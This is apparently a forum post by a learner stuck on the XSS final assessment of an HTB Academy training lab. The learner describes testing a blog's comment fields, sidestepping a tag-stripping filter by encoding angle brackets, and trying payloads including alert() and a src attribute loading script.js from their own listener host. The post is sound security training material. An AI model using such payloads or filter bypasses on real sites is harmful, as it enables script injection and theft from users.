I’m getting stuck with the Final Assessment of XSS modue on Academy HTB.
Apart that the target website does not store comments anymore, I don’t know why (I tried also to reset the machine but I get always the same target IP address), I approached the problem in the following way:
On the index page, at http://10.129.222.0/assessment/index.php, I have one only search input. I tried to inject any XSS payload and I get a message like “Results for “”” so it is like it does not filter my input even if nothing is triggered.
Then, I moved to welcome-to-security-blog page, where I can see different input forms: Comment, Name, Email, Website.
Among these forms, Email form requires to have an email pattern, and Website form adds “http://” at the beginning of the text I inject, so I would exclude these two forms.
Analyzing Comment and Name form, I noted that they filter the inputs so I guess one of them should be vulnerable. My suspicious focuses more on Name where the filter deletes all contents between “<” and “>”, so my solution was to encode the “<” char as “<”. With this approach, when I publish (and check for store) the comment, the Name with my XSS injection text is entirely shown, and Name value is linked with Website form. Anyway, despite this, when I use payloads like alert() or src=http://myIP:PORT/script.js (by running a listener on PORT on my machine) I don’t get anything. Of course I tried this approach also for Comment form.
Is my current approach correct or am I totally wrong? Should I check also other kinds of tags?
Thank you in advance!